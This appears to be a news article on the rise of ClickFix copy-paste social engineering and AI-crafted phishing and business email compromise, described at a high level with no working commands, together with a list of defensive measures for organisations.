Clickfix and AI Ignite a Spike in Human-Targeted Hacks

Gregory Zuckerman
By Gregory Zuckerman
Technology
7 Min Read

Hackers have discovered a faster path in, and it begins with you. A tsunami of Clickfix social engineering and more sophisticated AI-like tools are also helping threat actors skip malware-laden playbooks, slip right on past perimeter defenses, and navigate into the living room of corporate networks. The end result is a steep jump in successful intrusions that appears as though it’s ordinary assistance, not malicious code.

How Clickfix Makes Users Into Installers

Clickfix is deceptively simple. Instead of sneaking a malicious attachment to a user, the attacker offers up a clean-looking “fix” for an everyday annoyance like a license error, a balky plug-in or banned file. The instructions are clear-cut and reliable-seeming, typically with photos and the guarantee of instant gratification.

Table of Contents
Cybersecurity warning: Clickfix and AI drive surge in phishing and human-targeted hacks

But the heart of the riddle is in fact the instructions. Victims are instructed to run PowerShell or a terminal and copy-paste commands that pull down and execute cargo. Because the user is the one taking the action, common anti-phishing filters based on looking for clear evidence of malware are often defeated. This repeat tactic is something Microsoft and other security teams have alerted to over recent months, and in new threat intelligence from Mimecast, there’s been a very sudden increase in it as Clickfix becomes a significant proportion of all such observed attacks.

Attackers also add in legitimate remote monitoring and management (RMM) tools. By convincing users to install an “IT help” agent, attackers gain persistent access without dropping suspicious binaries. It is social engineering calibrated for the remote work, self-help tech era.

How AI Supercharges Modern Social Engineering

Generative AI has made phishing more of a theatrical production. Rather than writing one email with several typos, attackers create entire conversation threads that sound and feel exactly like vendors, executives or accounts payable teams inside target organizations. Mimecast has seen AI-driven chains that lash out over the course of days with attachments, previous replies and realistic follow-ups.

Business Email Compromise is the clear beneficiary. The FBI’s Internet Crime Complaint Center regularly reports billions in BEC losses and AI is growing the funnel. Attackers have now begun to plant deepfake voice and video to verify urgent requests, so “please expedite this wire” feels commonplace even if it’s not. A high-profile example with a deepfaked executive voice to approve the transaction, and paired with credible financial context, illustrates clearly how persuasive that can be.

And crucially, AI delivers personalization at scale. It generates rogue vendor references, it uses real invoice layouts, and it has dynamic phrasing to overcome text-based detection. The upshot: fewer tells, greater trust — and faster payouts.

Clickfix and AI fuel surge in human-targeted hacks, phishing, and social engineering attacks

Industries Most in the Crosshairs for These Attacks

Increased risk faces education, IT and telecom, legal services, and real estate. These industries commonly transact in sensitive contracts and movement of money, and frequently depend on email to sign off on those changes. Housing is a good example: escrow and title communications are fertile soil for invoice swaps and bank details tampering.

Scattered Spider and TA2541 are among the groups tied to these trust-fabric-abusing campaigns. When every inbox is a supply chain dependency, one compelling email can mean enterprise access.

Why Older Defenses Keep Missing These Human Attacks

Most secure email gateways are great at stopping some known-bad attachments and URLs. Clickfix elides both by weaponizing instructions. AI-based campaigns complicate filters even more by using a different language or adding true-to-life responses, field manual style.

On the endpoints, “living off the land” tactics are even more difficult to flag without context. PowerShell (WMI) and legitimate RMM tools are a necessary evil for IT. Defenders are aware of this, and adversaries keep activity below common thresholds incorporating factors such as MFA fatigue prompts, token redirects, and session hijacking to persist quietly.

Defenses That Actually Move the Needle Today

  • Harden high-impact defaults. Limit scripting with PowerShell Constrained Language Mode and Just Enough Administration, or prevent standard users from running scripts. Combine with application control to prevent unauthorized tools and unsigned scripts from being executed.
  • Close the RMM blind spot. Enforce an allowlist for authorized external tools and enable code-signing; when new agent installs or outbound beaconing to unknown control servers is detected, raise the alarm. Inventory is a control, not a spreadsheet — keep it live.
  • Make payment changes high-friction. Require out-of-band confirmation for bank account changes, vendor additions and payroll updates. Introduce role-based authorizations and time intervals for large-amount transfers. Your finance workflows are security controls just like a firewall.
  • Strengthen email trust signals. Implement DMARC even at its most baseline level of enforcement with alignment, and check for lookalike domains and supplier impersonation. Be smart with banners in external mail, and coach your users that any instruction to paste commands into a terminal is a warning sign.
  • Lean on detection depth. Endpoint detection and response solutions – such as those from Carbon Black, FireEye, Cybereason – should be alerted on suspicious child processes (e.g., Office spawning PowerShell), adversarial script execution, and new persistence keys. Bind telemetry to rapid containment by isolation playbooks.
  • Modernize awareness training. Get past “spot the typo” and practice real-life scenarios: faux vendor threads, urgent requests from your CFO with deepfake voicemail and Clickfix-style “IT fixes.” People are the new perimeter; they need tools and time to verify before they comply.

The core story is elemental but vital. Clickfix reduces the barrier to publication, and AI reduces the barrier to persuasion. Together, they are speeding compromise by transforming a daily click into privileged access. Those organizations that are ready to adapt their controls accordingly, then, will be the ones not compelled to an apology from within the breach headlines.

Gregory Zuckerman
ByGregory Zuckerman
Gregory Zuckerman is a veteran investigative journalist and financial writer with decades of experience covering global markets, investment strategies, and the business personalities shaping them. His writing blends deep reporting with narrative storytelling to uncover the hidden forces behind financial trends and innovations. Over the years, Gregory’s work has earned industry recognition for bringing clarity to complex financial topics, and he continues to focus on long-form journalism that explores hedge funds, private equity, and high-stakes investing.
Latest News